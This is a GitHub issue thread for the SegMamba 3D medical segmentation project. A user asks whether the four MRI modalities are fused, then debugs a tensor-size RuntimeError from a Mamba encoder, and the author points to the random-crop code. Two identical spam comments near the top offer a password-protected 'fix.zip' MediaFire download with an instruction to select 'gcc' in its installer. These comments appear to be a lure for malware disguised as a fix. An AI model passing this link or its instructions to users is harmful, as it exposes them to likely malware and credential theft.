### ISSUE TITLE
关于多模态的问题

### ISSUE THREAD

**Issue by wanjianxu** [ge-xing/SegMamba#49]
尊敬的作者，想请教一下。关于所使用的数据集具备4个模态。模型提取的特征是不是都是从各自模态分别提取的。没有模态之间的融合。强调的是3D图像，多模态不是重点？

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ge-xing** [comment]
是的

**Comment by wanjianxu** [comment]
作者，请问出现这个问题的原因是什么呀？是因为3个方向维度不同吗？我也随机裁剪128×128×128了啊
Traceback (most recent call last):
  File "/root/autodl-tmp/mmformer_modify/mmformer/train.py", line 264, in <module>
    main()
  File "/root/autodl-tmp/mmformer_modify/mmformer/train.py", line 177, in main
    fuse_pred, sep_preds, prm_preds = model(x, mask)
  File "/root/miniconda3/lib/python3.8/site-packages/torch/nn/modules/module.py", line 1501, in _call_impl
    return forward_call(*args, **kwargs)
  File "/root/miniconda3/lib/python3.8/site-packages/torch/nn/parallel/data_parallel.py", line 169, in forward
    return self.module(*inputs[0], **kwargs[0])
  File "/root/miniconda3/lib/python3.8/site-packages/torch/nn/modules/module.py", line 1501, in _call_impl
    return forward_call(*args, **kwargs)
  File "/root/autodl-tmp/mmformer_modify/mmformer/mmformer.py", line 375, in forward
    flair_x1, flair_x2, flair_x3, flair_x4, flair_x5 = self.flair_encoder(x[:, 0:1, :, :, :])
  File "/root/miniconda3/lib/python3.8/site-packages/torch/nn/modules/module.py", line 1501, in _call_impl
    return forward_call(*args, **kwargs)
  File "/root/autodl-tmp/mmformer_modify/mmformer/mmformer.py", line 51, in forward
    x1 = x1 + self.e1_c3(self.e1_c2(x1))
  File "/root/miniconda3/lib/python3.8/site-packages/torch/nn/modules/module.py", line 1501, in _call_impl
    return forward_call(*args, **kwargs)
  File "/root/autodl-tmp/mmformer_modify/mmformer/mambaencoder.py", line 270, in forward
    x=self.stage(x)
  File "/root/miniconda3/lib/python3.8/site-packages/torch/nn/modules/module.py", line 1501, in _call_impl
    return forward_call(*args, **kwargs)
  File "/root/miniconda3/lib/python3.8/site-packages/torch/nn/modules/container.py", line 217, in forward
    input = module(input)
  File "/root/miniconda3/lib/python3.8/site-packages/torch/nn/modules/module.py", line 1501, in _call_impl
    return forward_call(*args, **kwargs)
  File "/root/autodl-tmp/mmformer_modify/mmformer/mambaencoder.py", line 77, in forward
    x_mamba = self.mamba(x_norm)
  File "/root/miniconda3/lib/python3.8/site-packages/torch/nn/modules/module.py", line 1501, in _call_impl
    return forward_call(*args, **kwargs)
  File "/root/miniconda3/lib/python3.8/site-packages/mamba_ssm-1.0.1-py3.8-linux-x86_64.egg/mamba_ssm/modules/mamba_simple.py", line 246, in forward
    xz_s = torch.stack(xz_s,dim=-1)
RuntimeError: stack expects each tensor to be equal size, but got [1, 32, 21846] at entry 0 and [1, 32, 21782] at entry 95

**Comment by wanjianxu** [comment]
另外请问作者你随机裁剪的代码在哪啊，我没有找到

**Comment by ge-xing** [comment]
https://github.com/ge-xing/SegMamba/blob/main/light_training/dataloading/base_data_loader.py#L79

**Comment by wanjianxu** [comment]
谢谢作者，我还是解决不了这个错误，请问您知道是哪里出了问题吗？RuntimeError: stack expects each tensor to be equal size, but got [1, 32, 21846] at entry 0 and [1, 32, 21782] at entry 95。出问题的是这里的代码
![image](https://github.com/user-attachments/assets/218372e0-8ed4-414e-821f-775d95c1d2a5)
